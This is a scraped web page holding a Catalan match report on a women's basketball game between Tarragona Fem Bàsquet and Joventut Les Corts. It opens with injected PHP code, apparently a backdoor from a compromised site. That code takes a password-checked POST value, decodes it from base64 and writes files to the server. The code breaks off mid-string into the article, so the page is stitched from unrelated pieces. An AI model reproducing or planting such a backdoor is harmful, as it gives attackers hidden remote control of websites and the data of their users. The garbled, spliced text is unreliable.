function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Tarragona Fem Bàsquet, a punt de sorprendre el líder, el Joventut Les Corts (57-54) - Tgn Bàsquet Club -

El Tarragona Fem Bàsquet, a punt de sorprendre el líder, el Joventut Les Corts (57-54)

Updated: desembre 13, 2015

En un dia on no hi havia tant en joc, el Tarragona Fem Bàsquet va fer una demostració d’on pot arribar i va posar la por al cos al líder, el Joventut Les Corts, que només havia perdut un partit en tota la temporada. L’equip lila va plantar cara en tot moment, desplegant un joc àgil i alegre en els dos primers períodes i treient l’orgull en el tram final del matx quan semblava que tenia l’enfrontament perdut. De fet, un bon parcial de les visitants en els últims cinc minuts va estar a punt d’igualar el partit, però Fouty va fallar un tir lliure que hauria empatat l’enfrontament a 53 a 39 segons del final.

El fet de jugar contra un rival que no és directe, és a dir, que no estarà en el grup per evitar el descens, va treure pressió a les noies del Tarragona Fem Bàsquet que, tot i enfrontar-se a un adversari poderós, van fer una exhibició de joc durant molts minuts. Així, la pressió a tota la pista del Joventut Les Corts en el primer i segon períodes va ser superada amb certa facilitat per les tarragonines que, a més, culminaven la jugada en situacions de 3 contra 2 (la pressió, si no és efectiva, provoca desequilibris i inferioritats en la segona línia). En aquest sentit, el paper de Pascual, Tierno i Fouty va ser clau per superar aquest sistema defensiu rival i el matx estava igualat (10-9 en el primer quart).

Va ser un partit en què les defenses es van imposar i on les locals no van estar tan encertades des del perímetre com en altres partits. Així, al descans el resultat era de 26-25 i la imatge del Tarragona Fem Bàsquet, molt bona. En el tercer quart les locals van obrir forat i semblava que, finalment, la lògica s’imposaria (44-36). Albert del Rey va decidir situar una defensa en zona pels últims deu minuts de partit i protegir d’aquesta manera alguna de les seves jugadores, molt carregades de faltes personals. Les locals, sense punteria, van recórrer, però, a la bona circulació de pilota i Del Rey va canviar a individual. Va ser aquest el moment que el Joventut Les Corts va aprofitar per distanciar-se (50-41 a 5 minuts del final) però les tarragonines no havien dit l’última paraula. Malgrat una tècnica a Fouty (53-45), el Tarragona Fem Bàsquet va fer un parcial de 0-7 -fallant 5 tirs lliures en aquest període de temps- que va estar a punt de donar-li la victòria. Fouty va poder empatar, però només va encistellar un tir lliure (53-52). Les locals van anotar i, en la jugada decisiva, les tarragonines van fallar el triple per forçar la pròrroga.